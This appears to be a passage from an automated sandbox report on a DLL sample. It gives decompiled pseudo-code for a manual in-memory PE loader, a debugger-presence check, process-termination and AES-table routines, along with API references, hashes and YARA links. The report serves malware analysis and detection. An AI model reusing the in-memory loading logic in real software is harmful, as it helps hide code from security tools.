																		goto L33;
																	} else {
																		_t392 =  *_t302 + _v52;
																		E6F33DD40(_t392,  *((intOrPtr*)(_t302 + 8)) + _v48,  *((intOrPtr*)(_t302 + 4)));
																		 *((intOrPtr*)(_t302 - 4)) = _t392;
																		goto L26;
																	}
																}
															} else {
																_t395 =  *((intOrPtr*)( &(_v48[0xe]) + _v72));
																if(_t395 <= 0) {
																	goto L27;
																} else {
																	_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t395, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t288 == 0) {
																		goto L33;
																	} else {
																		 *((intOrPtr*)(_t302 - 4)) =  *_t302 + _v52;
																		E6F33D230(_t362,  *_t302 + _v52, 0, _t395);
																		L26:
																		_t345 = _v52;
																		_t397 = _t397 + 0xc;
																		goto L27;
																	}
																}
															}
															goto L89;
															L27:
															_t314 =  *_t362;
															_t302 = _t302 + 0x28;
															_t394 = _v64 + 1;
															_v64 = _t394;
														} while (_t394 < ( *(_t314 + 6) & 0x0000ffff));
														_t297 = _v68;
														goto L29;
													}
												}
											} else {
												VirtualFree(_v60, _t212, 0x8000);
												goto L15;
											}
										} else {
											_t293 = VirtualAlloc(_t209, _t361, 0x3000, 4);
											_v60 = _t293;
											if(_t293 == 0) {
												L15:
												_push(0xe);
												L88:
												SetLastError();
												return E6F33C65E(_v8 ^ _t396);
											} else {
												goto L13;
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				L89:
			}

0x6f33bb36
0x6f33bb3d
0x6f33bb43
0x6f33bb45
0x6f33bb46
0x6f33bb48
0x6f33bb4b
0x6f33bb4e
0x6f33bb52
0x6f33bb72
0x6f33bb72
0x00000000
0x6f33bb54
0x6f33bb5c
0x6f33c0b0
0x6f33c0b0
0x00000000
0x6f33bb62
0x6f33bb62
0x6f33bb62
0x6f33bb65
0x6f33bb68
0x6f33bb70
0x6f33bb80
0x6f33bb83
0x6f33bb86
0x00000000
0x6f33bb9b
0x6f33bb9b
0x6f33bba1
0x00000000
0x6f33bba7
0x6f33bbab
0x6f33bbaf
0x6f33bbb4
0x6f33bbb6
0x6f33bbb8
0x6f33bbb8
0x6f33bbbb
0x6f33bbc0
0x6f33bbc3
0x6f33bbc8
0x6f33bbcb
0x6f33bbcd
0x6f33bbd0
0x6f33bbd0
0x6f33bbb8
0x6f33bbd9
0x6f33bbdf
0x6f33bbe8
0x6f33bbf2
0x6f33bbf8
0x00000000
0x6f33bbfe
0x6f33bc0f
0x6f33bc11
0x6f33bc16
0x6f33bc2a
0x6f33bc33
0x6f33bc39
0x6f33bc3f
0x6f33bc41
0x6f33bc46
0x6f33bc64
0x6f33bc71
0x6f33bc78
0x6f33bc7b
0x6f33bc82
0x6f33bc89
0x6f33bc90
0x6f33bc97
0x6f33bca1
0x6f33bcae
0x6f33bde2
0x6f33bde5
0x6f33bdea
0x6f33bded
0x6f33bdf2
0x6f33bdf4
0x6f33bdf9
0x6f33be00
0x6f33be00
0x6f33be03
0x6f33be08
0x6f33be11
0x6f33be13
0x6f33be16
0x6f33be16
0x6f33be19
0x6f33be1a
0x6f33be00
0x6f33be20
0x6f33be25
0x6f33be25
0x6f33be28
0x6f33be2d
0x6f33be3d
0x6f33be3f
0x6f33be49
0x6f33be61
0x6f33bcb4
0x6f33bcc6
0x6f33bccc
0x6f33bcd4
0x6f33bcda
0x6f33bce4
0x6f33bce8
0x6f33bcea
0x6f33bced
0x6f33bcef
0x6f33bcf2
0x6f33bcf9
0x6f33bd00
0x6f33bdb7
0x6f33bdba
0x6f33bdbd
0x6f33bdc0
0x6f33becd
0x6f33becd
0x6f33bdc6
0x6f33bdcd
0x6f33be62
0x6f33be6b
0x6f33be6d
0x6f33be70
0x6f33be74
0x6f33be76
0x6f33be76
0x6f33be7b
0x6f33be7e
0x6f33be81
0x6f33be8b
0x6f33be8d
0x6f33be90
0x6f33be90
0x6f33bea1
0x6f33beab
0x6f33beab
0x6f33beae
0x6f33beb1
0x6f33beb2
0x6f33beba
0x6f33be90
0x6f33bebe
0x6f33bec1
0x6f33bec3
0x6f33bec6
0x6f33beca
0x6f33beca
0x00000000
0x6f33bdd3
0x6f33bdd3
0x6f33bdd3
0x6f33bdcd
0x6f33bed4
0x6f33bede
0x00000000
0x6f33bee4
0x6f33bee4
0x6f33beef
0x6f33bef1
0x6f33bef4
0x6f33bef6
0x6f33bef9
0x6f33befc
0x6f33beff
0x6f33bf02
0x6f33bf07
0x6f33bf09
0x6f33bf0e
0x6f33bf17
0x6f33bf19
0x6f33bf19
0x6f33bf10
0x6f33bf10
0x6f33bf10
0x6f33bf0e
0x6f33bf1c
0x6f33bf24
0x6f33bf27
0x6f33bf2a
0x6f33bf31
0x6f33bf3c
0x6f33c005
0x6f33c008
0x6f33c018
0x00000000
0x6f33c01e
0x6f33c01e
0x6f33c020
0x6f33c022
0x6f33c02a
0x6f33c02c
0x6f33c02f
0x6f33c035
0x6f33c037
0x6f33c03b
0x6f33c040
0x6f33c045
0x6f33c047
0x6f33c04a
0x6f33c04d
0x6f33c051
0x6f33c051
0x6f33c03b
0x6f33c035
0x6f33c053
0x6f33c058
0x6f33c096
0x6f33c0af
0x6f33c05a
0x6f33c05a
0x6f33c061
0x6f33c080
0x6f33c095
0x6f33c063
0x6f33c063
0x6f33c068
0x6f33c07f
0x6f33c07f
0x6f33c061
0x6f33c058
0x6f33bf42
0x6f33bf42
0x6f33bf45
0x6f33bf50
0x6f33bf53
0x6f33bf59
0x6f33bf5e
0x6f33bf63
0x6f33bf66
0x6f33bf69
0x6f33bf6e
0x6f33bf78
0x6f33bf7a
0x00000000
0x6f33bf7a
0x6f33bf70
0x6f33bf70
0x6f33bf7d
0x6f33bf7d
0x6f33bf80
0x6f33bf80
0x6f33bf6e
0x6f33bf86
0x6f33bfc3
0x6f33bfc9
0x6f33bfcb
0x6f33bfcf
0x6f33bfd1
0x6f33bfd1
0x6f33bfdd
0x6f33bfe0
0x00000000
0x6f33bf88
0x6f33bf8f
0x6f33bfc0
0x00000000
0x6f33bf91
0x6f33bf9d
0x00000000
0x6f33bfa3
0x6f33bfa3
0x6f33bfa6
0x6f33bfa9
0x6f33bfab
0x6f33bfae
0x6f33bfb1
0x6f33bfb3
0x6f33bfb6
0x6f33bfb9
0x6f33bfbc
0x00000000
0x6f33bfbc
0x6f33bf9d
0x6f33bf8f
0x00000000
0x6f33bfe3
0x6f33bfe9
0x6f33bfec
0x6f33bff3
0x6f33bff6
0x6f33bff9
0x6f33bffc
0x6f33bffc
0x00000000
0x6f33bf50
0x6f33bf3c
0x6f33bd06
0x6f33bd06
0x6f33bd10
0x6f33bd10
0x6f33bd15
0x6f33bd60
0x6f33bddc
0x00000000
0x6f33bd62
0x6f33bd75
0x6f33bd77
0x6f33bd7c
0x00000000
0x6f33bd7e
0x6f33bd89
0x6f33bd8e
0x6f33bd93
0x00000000
0x6f33bd93
0x6f33bd7c
0x6f33bd17
0x6f33bd1d
0x6f33bd23
0x00000000
0x6f33bd25
0x6f33bd38
0x6f33bd3a
0x6f33bd3f
0x00000000
0x6f33bd45
0x6f33bd4e
0x6f33bd51
0x6f33bd96
0x6f33bd96
0x6f33bd99
0x00000000
0x6f33bd99
0x6f33bd3f
0x6f33bd23
0x00000000
0x6f33bd9c
0x6f33bd9c
0x6f33bd9e
0x6f33bda4
0x6f33bda5
0x6f33bdac
0x6f33bdb4
0x00000000
0x6f33bdb4
0x6f33bd00
0x6f33bc48
0x6f33bc51
0x00000000
0x6f33bc51
0x6f33bc18
0x6f33bc21
0x6f33bc23
0x6f33bc28
0x6f33bc57
0x6f33bc57
0x6f33c0b5
0x6f33c0b5
0x6f33c0cd
0x00000000
0x00000000
0x00000000
0x6f33bc28
0x6f33bc16
0x6f33bbf8
0x6f33bba1
0x00000000
0x00000000
0x00000000
0x6f33bb70
0x6f33bb5c
0x00000000

APIs

GetNativeSystemInfo.KERNEL32(?,-00000017,00000000,00000000), ref: 6F33BBD9
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 6F33BC0F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 6F33BC21
HeapAlloc.KERNEL32(00000000), ref: 6F33BC39
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33BC51

Part of subcall function 6F33B840: SetLastError.KERNEL32(0000000D,6F33BCAC), ref: 6F33B846

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6F33BCC1
SetLastError.KERNEL32(0000000D), ref: 6F33BDDC
HeapFree.KERNEL32(00000000), ref: 6F33BE49
SetLastError.KERNEL32(0000000D,-00000017,00000000,00000000), ref: 6F33C0B5

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$ErrorLast$FreeHeap$InfoNativeSystem
String ID:
API String ID: 2732102410-0
Opcode ID: 2721a413e2d9e88fb7b6148a5f7cd0d7296eb2703248a4b7b77209969e7457bd
Instruction ID: a4cd92ac346512d323ba736ab6a7455bb7ce459325df4d3f3fd8312928c66a15
Opcode Fuzzy Hash: 2721a413e2d9e88fb7b6148a5f7cd0d7296eb2703248a4b7b77209969e7457bd
Instruction Fuzzy Hash: D5127A72E00A699FDB14CFA8D980B99B7F5FF48304F14416AE919AF385D731E851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F33FF39, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6F33FF39(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6f36609c; // 0xe80c9ffe
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6F33CFBC(_t41);
					_pop(_t62);
				}
				E6F33D230(_t67,  &_v804, 0, 0x50);
				E6F33D230(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x5f000001
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6f339ed2
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0x3c248c8b
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x2780
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xc35de58b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x5f000001
				_v792 =  *_t34;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6f339ba6
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xe8cc335e
					_push( *_t38);
					E6F33CFBC(_t57);
				}
				_t39 =  &_v8; // 0xfffe8141
				return E6F33C65E( *_t39 ^ _t70);
			}

0x6f33ff39
0x6f33ff39
0x6f33ff39
0x6f33ff39
0x6f33ff44
0x6f33ff49
0x6f33ff4b
0x6f33ff53
0x6f33ff55
0x6f33ff58
0x6f33ff5d
0x6f33ff5d
0x6f33ff69
0x6f33ff7c
0x6f33ff8a
0x6f33ff90
0x6f33ff96
0x6f33ff9c
0x6f33ffa2
0x6f33ffa8
0x6f33ffae
0x6f33ffb4
0x6f33ffba
0x6f33ffc0
0x6f33ffc7
0x6f33ffce
0x6f33ffd5
0x6f33ffdc
0x6f33ffe3
0x6f33ffea
0x6f33ffeb
0x6f33fff1
0x6f33fff4
0x6f33fffa
0x6f33fffa
0x6f33fffd
0x6f340003
0x6f34000d
0x6f340010
0x6f340016
0x6f340019
0x6f34001f
0x6f340022
0x6f340028
0x6f34002b
0x6f340039
0x6f34003b
0x6f340041
0x6f340050
0x6f34005c
0x6f34005c
0x6f34005f
0x6f340064
0x6f340065
0x6f340073

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6F33C0D0), ref: 6F340031
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6F33C0D0), ref: 6F34003B
UnhandledExceptionFilter.KERNEL32(6F339BA6,?,?,?,?,?,6F33C0D0), ref: 6F340048

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 612a8ac20c719714589e70ab3084ecf784653a21d0d27d913a92d0ecbbc39040
Instruction ID: 9647a9f3d4d4af23602dc7846e7fd7302211801310a6561fdce1ed8d545821c9
Opcode Fuzzy Hash: 612a8ac20c719714589e70ab3084ecf784653a21d0d27d913a92d0ecbbc39040
Instruction Fuzzy Hash: E031D675D1132CABCB21DF64D9887CDB7B8AF18310F5045DAE81CA7290EB319B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 6F33F416, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33F416(int _a4) {
				void* _t14;

				if(E6F3414AE(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6F33F49B(_t14, _a4);
				ExitProcess(_a4);
			}

0x6f33f423
0x6f33f43f
0x6f33f43f
0x6f33f448
0x6f33f451

APIs

GetCurrentProcess.KERNEL32(?,?,6F33F415,?,00000001,?,?), ref: 6F33F438
TerminateProcess.KERNEL32(00000000,?,6F33F415,?,00000001,?,?), ref: 6F33F43F
ExitProcess.KERNEL32 ref: 6F33F451

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0c35d3d5b9eeea91d25ec53938b8e50b43a11e4b23315fe37a6374acc67d3965
Instruction ID: 5bbed40ad618653cdea70a0493fea6dd6fdddbd825a7a12429ea2948fde92150
Opcode Fuzzy Hash: 0c35d3d5b9eeea91d25ec53938b8e50b43a11e4b23315fe37a6374acc67d3965
Instruction Fuzzy Hash: 22E08C32914A48BFCF12BF60C808A483B7CEF01261B414418F8089A260CF36EEA6DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F339F20, Relevance: 2.7, Strings: 2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E6F339F20() {
				signed int _v8;
				signed int _v12;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v992;
				intOrPtr _v1000;
				char _v1040;
				signed int _t86;
				unsigned int _t90;
				char _t97;
				signed int _t102;
				signed int _t108;
				signed int _t122;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t163;
				signed int _t164;
				intOrPtr _t165;
				signed int _t167;
				signed int* _t168;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				void* _t179;

				_t167 = 1;
				_t176 = 0;
				do {
					 *(_t179 + _t176 * 4 - 0x808) = _t167;
					 *(_t179 + _t167 * 4 - 0x408) = _t176;
					asm("sbb ecx, ecx");
					_t176 = _t176 + 1;
					_t167 = ( ~(_t167 & 0x80) & 0x0000001b ^ _t167 + _t167 ^ _t167) & 0x000000ff;
				} while (_t176 < 0x100);
				_t177 = 1;
				_t168 = 0x6f37ee68;
				do {
					 *_t168 = _t177;
					asm("sbb ecx, ecx");
					_t168 =  &(_t168[1]);
					_t177 = ( ~(_t177 & 0x80) & 0x0000001b ^ _t177 + _t177) & 0x000000ff;
				} while (_t168 < 0x6f37ee90);
				_t86 = 1;
				 *0x6f37e868 = 0x63;
				 *0x6f37edcb = 0;
				_v8 = 1;
				do {
					_t122 =  *( &_v1040 - ( *(_t179 + _t86 * 4 - 0x408) << 2));
					_t90 = (_t122 >> 0x00000007 | _t122 + _t122) & 0x000000ff;
					_t125 = _t122 ^ _t90 ^ (_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff ^ ((((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff) >> 0x00000007 | ((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff) + ((((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff)) ^ 0x00000063) & 0x000000ff ^ (((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) >> 0x00000007 | ((_t90 >> 0x00000007 | _t90 + _t90) & 0x000000ff) + _t92) & 0x000000ff;
					_t97 = _v8;
					 *(_t97 + 0x6f37e868) = _t125;
					 *((char*)(_t125 + 0x6f37ed68)) = _t97;
					_t86 = _t97 + 1;
					_v8 = _t86;
				} while (_t86 < 0x100);
				_t126 = 0xff;
				_t178 = 0;
				_v12 = 0xff;
				do {
					_t21 = _t178 + 0x6f37e868; // 0x0
					_t170 =  *_t21 & 0x000000ff;
					asm("sbb ecx, ecx");
					_t163 = (((( ~( *_t21 & 0x80) & 0x0000001b ^ _t170 + _t170) & 0x000000ff ^ _t170) << 0x00000008 ^ _t170) << 0x00000008 ^ _t170) << 0x00000008 ^ ( ~( *_t21 & 0x80) & 0x0000001b ^ _t170 + _t170) & 0x000000ff;
					 *(0x6f380290 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f37fe90 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f37f290 + _t178 * 4) = _t163;
					asm("rol ecx, 0x8");
					 *(0x6f37ee90 + _t178 * 4) = _t163;
					_t31 = _t178 + 0x6f37ed68; // 0x0
					_t164 =  *_t31 & 0x000000ff;
					if(_t164 == 0) {
						_t127 = 0;
						_t175 = 0;
						_v8 = 0;
						_t102 = 0;
					} else {
						_t165 =  *((intOrPtr*)(_t179 + _t164 * 4 - 0x408));
						asm("cdq");
						_t175 =  *(_t179 + (_v980 + _t165) % _t126 * 4 - 0x808);
						asm("cdq");
						_t127 =  *(_t179 + (_v1000 + _t165) % _t126 * 4 - 0x808);
						asm("cdq");
						_v8 =  *((intOrPtr*)(_t179 + (_v984 + _t165) % _v12 * 4 - 0x808));
						asm("cdq");
						_t102 =  *(_t179 + (_v992 + _t165) % 0xff * 4 - 0x808);
					}
					_t126 = 0xff;
					_t108 = ((_t102 << 0x00000008 ^ _v8) << 0x00000008 ^ _t127) << 0x00000008 ^ _t175;
					 *(0x6f37fa90 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f37f690 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f380690 + _t178 * 4) = _t108;
					asm("rol eax, 0x8");
					 *(0x6f37e968 + _t178 * 4) = _t108;
					_t178 = _t178 + 1;
				} while (_t178 < 0x100);
				return _t108;
			}

0x6f339f29
0x6f339f31
0x6f339f33
0x6f339f35
0x6f339f3e
0x6f339f4d
0x6f339f4f
0x6f339f57
0x6f339f5a
0x6f339f62
0x6f339f67
0x6f339f70
0x6f339f72
0x6f339f7e
0x6f339f80
0x6f339f88
0x6f339f8b
0x6f339f93
0x6f339f98
0x6f339f9f
0x6f339fa6
0x6f339fb0
0x6f339fc2
0x6f339fce
0x6f339fff
0x6f33a001
0x6f33a004
0x6f33a00a
0x6f33a010
0x6f33a011
0x6f33a014
0x6f33a01b
0x6f33a020
0x6f33a022
0x6f33a025
0x6f33a025
0x6f33a025
0x6f33a038
0x6f33a053
0x6f33a055
0x6f33a05c
0x6f33a05f
0x6f33a066
0x6f33a069
0x6f33a070
0x6f33a073
0x6f33a07a
0x6f33a07a
0x6f33a083
0x6f33a0df
0x6f33a0e1
0x6f33a0e3
0x6f33a0e6
0x6f33a085
0x6f33a085
0x6f33a094
0x6f33a09f
0x6f33a0a6
0x6f33a0b1
0x6f33a0b8
0x6f33a0c3
0x6f33a0d3
0x6f33a0d6
0x6f33a0d6
0x6f33a0f3
0x6f33a0fb
0x6f33a0fd
0x6f33a104
0x6f33a107
0x6f33a10e
0x6f33a111
0x6f33a118
0x6f33a11b
0x6f33a122
0x6f33a123
0x6f33a135

Strings

D7o, xrefs: 6F33A0B9
h7o, xrefs: 6F339F67

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: D7o$h7o
API String ID: 0-216898338
Opcode ID: ceb79466768e9f9606ac9d8db4d062832a299b1caf7a51a471c27258aa0728db
Instruction ID: 3a93c090cb2539acd179a8711dfd0678550c4dbe2f24a6d97239fd6beb2c96aa
Opcode Fuzzy Hash: ceb79466768e9f9606ac9d8db4d062832a299b1caf7a51a471c27258aa0728db
Instruction Fuzzy Hash: 26510471B102348BDB5CCF6CC8913A9BBE5EB8A304F44417EE5C7D7381D6789A958B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F346564, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F346564(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6F345F8B(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6F345EF1(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
